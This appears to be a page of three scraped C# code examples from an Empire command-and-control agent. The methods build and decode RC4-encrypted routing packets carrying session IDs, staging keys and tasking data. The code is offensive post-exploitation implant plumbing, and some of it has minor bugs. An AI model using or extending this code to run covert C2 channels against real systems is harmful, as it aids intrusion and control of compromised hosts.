Example #1
0
        ////////////////////////////////////////////////////////////////////////////////
        private byte[] newRoutingPacket(byte[] encryptedBytes, Int32 meta)
        {
            Int32 encryptedBytesLength = 0;

            if (encryptedBytes != null && encryptedBytes.Length > 0)
            {
                encryptedBytesLength = encryptedBytes.Length;
            }

            byte[] data = Encoding.ASCII.GetBytes(sessionId);
            data = Misc.combine(data, new byte[4] {
                0x01, Convert.ToByte(meta), 0x00, 0x00
            });
            data = Misc.combine(data, BitConverter.GetBytes(encryptedBytesLength));

            byte[] initializationVector = newInitializationVector(4);
            byte[] rc4Key            = Misc.combine(initializationVector, stagingKeyBytes);
            byte[] routingPacketData = EmpireStager.rc4Encrypt(rc4Key, data);

            routingPacketData = Misc.combine(initializationVector, routingPacketData);
            if (encryptedBytes != null && encryptedBytes.Length > 0)
            {
                routingPacketData = Misc.combine(routingPacketData, encryptedBytes);
            }

            return(routingPacketData);
        }
Example #2
0
        ////////////////////////////////////////////////////////////////////////////////
        //
        ////////////////////////////////////////////////////////////////////////////////
        private byte[] NewRoutingPacket(byte[] encryptedBytes, int meta)
        {
            int encryptedBytesLength = 0;

            if (encryptedBytes != null && encryptedBytes.Length > 0)
            {
                encryptedBytesLength = encryptedBytes.Length;
            }

            byte[] data = Encoding.ASCII.GetBytes(sessionInfo.GetAgentID());
            byte   lang = 0x03;

            data = Misc.combine(data, new byte[4] {
                lang, Convert.ToByte(meta), 0x00, 0x00
            });
            data = Misc.combine(data, BitConverter.GetBytes(encryptedBytesLength));

            byte[] initializationVector = NewInitializationVector(4);
            byte[] rc4Key            = Misc.combine(initializationVector, sessionInfo.GetStagingKeyBytes());
            byte[] routingPacketData = EmpireStager.rc4Encrypt(rc4Key, data);

            routingPacketData = Misc.combine(initializationVector, routingPacketData);
            if (encryptedBytes != null && encryptedBytes.Length > 0)
            {
                routingPacketData = Misc.combine(routingPacketData, encryptedBytes);
            }

            return(routingPacketData);
        }
Example #3
0
        ////////////////////////////////////////////////////////////////////////////////
        internal void decodeRoutingPacket(byte[] packetData, ref JobTracking jobTracking)
        {
            this.jobTracking = jobTracking;

            if (packetData.Length < 20)
            {
                return;
            }
            Int32 offset = 0;

            while (offset < packetData.Length)
            {
                byte[] routingPacket = packetData.Skip(offset).Take(20).ToArray();
                byte[] routingInitializationVector = routingPacket.Take(4).ToArray();
                byte[] routingEncryptedData        = packetData.Skip(4).Take(16).ToArray();
                offset += 20;

                byte[] rc4Key = Misc.combine(routingInitializationVector, stagingKeyBytes);

                byte[] routingData     = EmpireStager.rc4Encrypt(rc4Key, routingEncryptedData);
                String packetSessionId = Encoding.UTF8.GetString(routingData.Take(8).ToArray());
                try
                {
                    byte language = routingPacket[8];
                    byte metaData = routingPacket[9];
                }
                catch (IndexOutOfRangeException error)
                {
                }
                byte[] extra        = routingPacket.Skip(10).Take(2).ToArray();
                UInt32 packetLength = BitConverter.ToUInt32(routingData, 12);

                if (packetLength < 0)
                {
                    break;
                }

                if (sessionId == packetSessionId)
                {
                    byte[] encryptedData = packetData.Skip(offset).Take(offset + (Int32)packetLength - 1).ToArray();
                    offset += (Int32)packetLength;
                    try
                    {
                        processTaskingPackets(encryptedData);
                    }
                    catch (Exception error)
                    {
                    }
                }
            }
        }